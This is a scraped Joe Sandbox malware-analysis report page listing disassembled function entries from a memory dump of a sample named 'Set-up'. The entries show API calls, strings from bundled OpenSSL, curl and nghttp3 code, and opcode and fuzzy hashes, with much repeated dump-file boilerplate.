Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: copy_integer$crypto/params.c$general_get_uint
API String ID: 1297977491-1187682564
Opcode ID: 68fbef201c598fbe4eb549102c36fe2f8e0f0a307e794b09413b1e48fa146262
Instruction ID: 793330a0815d636cbc7437e4662613b558cb7dd5f969a9abee0a655063db799c
Opcode Fuzzy Hash: 68fbef201c598fbe4eb549102c36fe2f8e0f0a307e794b09413b1e48fa146262
Instruction Fuzzy Hash: F52138BAB8960077E53072287C07F7F3B898BC5B58F19202DF7487A1C2F991589181A1

Function 00E62240 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,?,00E62BF4,00000008), ref: 00E622C1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,00E62BF4,00000008), ref: 00E62312

Strings

general_set_uint, xrefs: 00E622D2
copy_integer, xrefs: 00E6228B
crypto/params.c, xrefs: 00E62295, 00E622DC

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: copy_integer$crypto/params.c$general_set_uint
API String ID: 1297977491-3191580373
Opcode ID: 48c901a84bcf4c33d6fa8e0142eacfade2f262cef2b1eead7f29e138540b1669
Instruction ID: de04cf15441fda5867cbdc2654947e51b32564a52d83c2f0d902c9ae46f749ba
Opcode Fuzzy Hash: 48c901a84bcf4c33d6fa8e0142eacfade2f262cef2b1eead7f29e138540b1669
Instruction Fuzzy Hash: CB219EB07C8B016BEB34A564BC45F3A37889BD0788F14302DF645BA2C3E695AC404260

Function 00E640A0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,00E62075,?,?,?,?,?,?,00E62704,00000008), ref: 00E640C1

Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37262
Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37285
Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372C5
Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372E8

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00E62075,?,?,?,?,?,?,00E62704,00000008), ref: 00E6411E

Strings

copy_integer, xrefs: 00E64134
unsigned_from_signed, xrefs: 00E640D3
crypto/params.c, xrefs: 00E640DD, 00E6413E

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memcpymemset
String ID: copy_integer$crypto/params.c$unsigned_from_signed
API String ID: 2323844366-3781254518
Opcode ID: e54125977a62c3a15b4992faa0777fb980c441a29209bbc920f9ade5a76f7329
Instruction ID: 854271467f61a6cc3af6f824fd1352fbc10190e540ef572fd40e9561535a17e4
Opcode Fuzzy Hash: e54125977a62c3a15b4992faa0777fb980c441a29209bbc920f9ade5a76f7329
Instruction Fuzzy Hash: 8E016DE5B8931076E23072657C0BF6B3B88CBD1B48F142439F644B71C2F1956C948262

Function 00D2E600 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0121981C,nghttp3_qpack.c,00000811,?,?), ref: 00D2E866
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(space <= ctx->max_dtable_capacity,nghttp3_qpack.c,0000080D,?,?,?,?,?,00D3077F,?,?,00000000,00000000), ref: 00D2E87B

Strings

nghttp3_qpack.c, xrefs: 00D2E85C, 00D2E871
space <= ctx->max_dtable_capacity, xrefs: 00D2E876

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_qpack.c$space <= ctx->max_dtable_capacity
API String ID: 1222420520-1270044496
Opcode ID: b578816020b5b14538e93ec030189ee298bb8922e7aabac46788ef097340a715
Instruction ID: 65473b5ab294341ea96fb79496916d35f1664df23547c587897dd22906957933
Opcode Fuzzy Hash: b578816020b5b14538e93ec030189ee298bb8922e7aabac46788ef097340a715
Instruction Fuzzy Hash: DD8192B5A006119FD720DF24E842A26B7F5FFA531CF08862CE88997712E731F855CBA1

Function 00C881B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150stringCOMMON

Download Yara Rule

APIs

_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00C854E6), ref: 00C88235
strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002F), ref: 00C882D4
strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005C), ref: 00C882E1

Strings

mime.c, xrefs: 00C8824C, 00C882B8, 00C8832D, 00C88342, 00C8835E, 00C8837A, 00C8839C

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strrchr$_stat64
String ID: mime.c
API String ID: 2771713950-3378952128
Opcode ID: 56d606160986a244d172c7ac245009614ed9c811f974f9a98ae06508dc5a551b
Instruction ID: d5f1cd359a031879d257e3f51f5674582b96730c644b009a6b9b145ae9ba8827
Opcode Fuzzy Hash: 56d606160986a244d172c7ac245009614ed9c811f974f9a98ae06508dc5a551b
Instruction Fuzzy Hash: 1C5126B1A007009BEB14AF25CC867677694AF40B19F440238FD18DF2D6FBB5D9099B99

Function 00CC4380 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111stringnetworkCOMMON

Download Yara Rule

APIs

htons.WS2_32(?), ref: 00CC43D8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CC4409
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000020,?,00000001), ref: 00CC4457

Strings

curl_addrinfo.c, xrefs: 00CC4429, 00CC44C3

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: htonsmemcpystrlen
String ID: curl_addrinfo.c
API String ID: 2973076469-1838508774
Opcode ID: d769a3743d7c922bdd91b596e5f6e711331fad0138e8c103eec27619d26f9898
Instruction ID: 4d0b1f0d91caa57926137fde87c1ce2a111d59d1c9029a4c287532c33238874c
Opcode Fuzzy Hash: d769a3743d7c922bdd91b596e5f6e711331fad0138e8c103eec27619d26f9898
Instruction Fuzzy Hash: 114178B5A04745AFD704DF55C480B6AB7E4FF88314F18CA6DED998B251E330EA90CB91

Function 00CB6650 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 105stringCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?), ref: 00CB665D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CB670E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000010), ref: 00CB671C

Strings

altsvc.c, xrefs: 00CB6699, 00CB66AB, 00CB66BD

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strlen$_time64
String ID: altsvc.c
API String ID: 2413861649-3234676706
Opcode ID: 733b922c403e71fb369cdc9af501b5a59be44d5c74a91299cb142d653241c39f
Instruction ID: 803fb5f5f4df2f902901f692aca040d88a67f3ce2d50c771c41fbc944b2fd051
Opcode Fuzzy Hash: 733b922c403e71fb369cdc9af501b5a59be44d5c74a91299cb142d653241c39f
Instruction Fuzzy Hash: 5B3104F2E043016BDB00AE21EC82A6B7BD4AB94748F14453CFD5DA6242F775EE04D792

Function 00D242E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 00D2435F
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,00000000,?), ref: 00D243EF

Strings

tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 00D2435A, 00D243EA
nghttp3_conn.c, xrefs: 00D24355, 00D243E5

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 1222420520-4133914617
Opcode ID: e99475538a4529420f0f01d346fd1da4eda5c12d68ad1e0f0f6ff409df1df00d
Instruction ID: 4c7f75e135075534fe255aad4322b3aabd1f0026345a82e509ce23f67673d236
Opcode Fuzzy Hash: e99475538a4529420f0f01d346fd1da4eda5c12d68ad1e0f0f6ff409df1df00d
Instruction Fuzzy Hash: A931D272540265AFD7119F18FC09F9A77E9EFA5319F0904B8E8049B163E772E828C771

Function 00D2A090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(C2E85040,-0000000F,00000000,?,?,?,?,00D270DF,00000001,?,?,?), ref: 00D2A0E5

Part of subcall function 00D2A140: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 00D2A29A

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,00000218,?,?,?,?,00D270DF,00000001,?,?,?), ref: 00D2A135

Strings

ksl->head, xrefs: 00D2A130
nghttp3_ksl.c, xrefs: 00D2A12B

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _assertmemcpymemmove
String ID: ksl->head$nghttp3_ksl.c
API String ID: 374949274-2784241221
Opcode ID: 6c2916c9fbafb63b97c21e0c3b32b794c2ceb28c0a1f951b89e9fc9cdec1b898
Instruction ID: fb5f6bce4984cd5e311b99cab0b45b6417996828d16876153094aa705689c861
Opcode Fuzzy Hash: 6c2916c9fbafb63b97c21e0c3b32b794c2ceb28c0a1f951b89e9fc9cdec1b898
Instruction Fuzzy Hash: C61181702003119FDB159F08E98195AF7A6FFD5328F1CC55EE8498B645D334EC50CBA2

Function 00CB88C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

getsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 00CB893B
setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 00CB8960

Part of subcall function 00CA7620: GetModuleHandleA.KERNEL32(ntdll), ref: 00CA763F
Part of subcall function 00CA7620: GetProcAddress.KERNEL32(00000000,RtlVerifyVersionInfo), ref: 00CA764B
Part of subcall function 00CA7620: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,0000010C), ref: 00CA7695
Part of subcall function 00CA7620: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?), ref: 00CA76D3
Part of subcall function 00CA7620: VerSetConditionMask.KERNEL32(00000000,?,00000001,?), ref: 00CA76DA
Part of subcall function 00CA7620: VerSetConditionMask.KERNEL32(00000000,?,00000020,?,?,00000001,?), ref: 00CA76E4
Part of subcall function 00CA7620: VerSetConditionMask.KERNEL32(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00CA76EB
Part of subcall function 00CA7620: VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00CA76FC

Strings

@, xrefs: 00CB88C4
@, xrefs: 00CB8945

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: ConditionMask$AddressHandleModuleProcgetsockoptmemsetsetsockopt
String ID: @$ @
API String ID: 2103437208-1089145642
Opcode ID: fe0bfd7e968a432fcff498ab995c9b45f7568e920007f753ea7aca11dd4505ca
Instruction ID: 71a9a3d8712bb3af147bf059076d35f04c0a768ce72b43df84feef6169b4c589
Opcode Fuzzy Hash: fe0bfd7e968a432fcff498ab995c9b45f7568e920007f753ea7aca11dd4505ca
Instruction Fuzzy Hash: 3A01B9B0508342ABEB20AF14E94A7BA77ECAF41705F054528F984563C9EBB5DAC8C743

Function 00DA8970 Relevance: 6.7, APIs: 5, Instructions: 425COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,FFC0BFFA,?), ref: 00DA8A9A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000001,?,?), ref: 00DA8AEA
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00DA8BD7
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00DA8C2B
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00DA8E63

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: a0d36bb5d9c1acb87fcf4868d6289c91cedc037550d3fa296a52a41ebb4ac15c
Instruction ID: 656aad234cac0a6c3680fd298a9c6d5cf42e95b2a3a764cb161a9c40d59b9423
Opcode Fuzzy Hash: a0d36bb5d9c1acb87fcf4868d6289c91cedc037550d3fa296a52a41ebb4ac15c
Instruction Fuzzy Hash: E1F1BDB2A01611CFDB18CF18C59075ABBE2FF9A310F18C56DE8498B395DB35E854DBA0

Function 00FF28F0 Relevance: 6.5, APIs: 5, Instructions: 295COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00FF2B3F

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
